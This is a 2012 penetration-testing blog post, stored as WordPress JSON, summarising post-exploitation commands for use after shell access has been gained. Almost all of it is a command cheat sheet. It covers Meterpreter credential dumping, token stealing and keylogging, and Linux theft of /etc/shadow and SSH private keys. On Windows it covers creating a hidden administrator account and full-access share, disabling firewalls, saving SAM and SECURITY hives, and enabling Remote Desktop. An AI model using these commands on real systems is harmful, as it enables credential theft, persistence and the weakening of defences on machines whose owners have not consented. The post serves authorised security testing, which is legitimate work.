{"id":398,"date":"2012-02-07T17:40:46","date_gmt":"2012-02-07T16:40:46","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=398"},"modified":"2012-02-24T21:51:24","modified_gmt":"2012-02-24T20:51:24","slug":"post-exploit-commands","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/02\/07\/post-exploit-commands\/","title":{"rendered":"Post Exploit Commands"},"content":{"rendered":"<p>Credit for most of the below comes from <a href=\"http:\/\/twitter.com\/#!\/mubix\" target=\"_blank\">Mubix<\/a> who has created a few documents (on google docs) that lists what to actually do once shell access has been gained. You can <a href=\"http:\/\/www.room362.com\/blog\/2011\/9\/6\/post-exploitation-command-lists.html\" target=\"_blank\">read more about it here<\/a> and find the links to the docs, I&#8217;m simply blogging about it to make a summary of this for myself.<\/p>\n<h3>Meterpreter Post Auth<\/h3>\n<p><em>Information Gathering<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/><\/div><\/td><td><div class=\"text codecolorer\">getuid<br \/>\ngetpid<br \/>\ngetsprivs<br \/>\nsysinfo<br \/>\nscreenshot<br \/>\nrun winenum.rb<br \/>\nrun scraper.rb<br \/>\nrun checkvm<br \/>\nrun credscollect<br \/>\nrun get_local_subnets<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Escalating Privs<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"text codecolorer\">ps then migrate<br \/>\ngetsystem<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Tokens (use incognito)<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">list_tokens -u<br \/>\nimpersonate_token<br \/>\nsteal_token [pid]<br \/>\nrev2self<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Retrieve Passwords<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">hashdump<br \/>\ncachedump<br \/>\npost\/windows\/gather\/smart_hashdump<br \/>\npost\/windows\/gather\/credentials\/vnc<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Session<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">enumdesktops<br \/>\ngetdesktop<br \/>\nsetdesktop<br \/>\nuictl disable keyboard<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Keylog<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"text codecolorer\">keyscan_start<br \/>\nkeyscan_dump<br \/>\nkeyscan_stop<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<h3>Nix Post Auth<\/h3>\n<p><em>Disable Firewall<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">\/etc\/init.d\/iptables save<br \/>\n\/etc\/init.d\/iptables stop<br \/>\niptables-save &gt; \/root\/firewall.rules<br \/>\niptables-restore &lt; \/root\/firewall.rules<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Files to pull<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/><\/div><\/td><td><div class=\"text codecolorer\">\/etc\/passwd<br \/>\n\/etc\/shadow OR \/etc\/security\/shadow (on AIX)<br \/>\n\/etc\/groups OR \/etc\/gshadow<br \/>\n\/home\/*\/.ssh\/id*<br \/>\n\/etc\/sudoers<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>User Information<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"text codecolorer\">grep ^ssh \/home\/*\/.*hist*<br \/>\ngrep ^telnet `\/home\/*\/.*hist*<br \/>\ngrep ^mysql \/home\/*\/.*hist*<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><sh3>Windows Post Auth<\/h3>\n<p><em>Get current logged in user<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">@echo %USERNAME%<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Add user<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"text codecolorer\">net user pentest password \/add<br \/>\nnet localgroup administrators pentest \/add<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Add share<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">net share nothing$=C:\\ \/grant:pentest,FULL \/unlimited<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Disable Firewall<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">netsh firewall set opmode disable<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Auto Start Directories<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<br \/>\nC:\\Documents And Settings\\All Users\\Start Menu\\Programs\\StartUp\\<br \/>\nC:\\wmiOWS\\Start Menu\\Programs\\StartUp\\<br \/>\nC:\\WINNT\\Profiles\\All Users\\Start Menu\\Programs\\StartUp\\<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Accounts and Policies<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"text codecolorer\">net localgroup administrators OR net localgroup administrators \/domain<br \/>\nnet group \u201cDomain Admins\u201d \/domain<br \/>\nnet accounts ## or net accounts \/domain<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Files to pull<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"text codecolorer\">%SYSTEMROOT%\\repair\\SAM<br \/>\n%SYSTEMROOT%\\System32\\config\\RegBack\\SAM<br \/>\n%WINDIR%\\repair\\sam OR system OR software OR security<br \/>\nreg save HKLM\\Security security.hive<br \/>\nreg save HKLM\\System system.hive<br \/>\nreg save HKLM\\SAM sam.hive<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Enable Remote Desktop<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">reg add &quot;HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server&quot; \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Should you wish to have all this useful info (as well as an ascii table) then feel free to use the following wallpaper (1920&#215;1200).<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper-300x187.jpg\" alt=\"\" title=\"pentest_wallpaper\" width=\"300\" height=\"187\" class=\"aligncenter size-medium wp-image-394\" srcset=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper-300x187.jpg 300w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper-1024x640.jpg 1024w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper.jpg 1920w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nOr customize the <a href=\"http:\/\/www.phillips321.co.uk\/downloads\/pentest_wallpaper.xcf.7z\">GIMP XCF file<\/a> yourself.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Credit for most of the below comes from Mubix who has created a few documents (on google docs) that lists what to actually do once shell access has been gained. You can read more about it here and find the links to the docs, I&#8217;m simply blogging about it to make a summary of this [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":394,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,64,4],"tags":[147,146,148,5,47,145,113],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/398"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=398"}],"version-history":[{"count":10,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/398\/revisions"}],"predecessor-version":[{"id":411,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/398\/revisions\/411"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media\/394"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}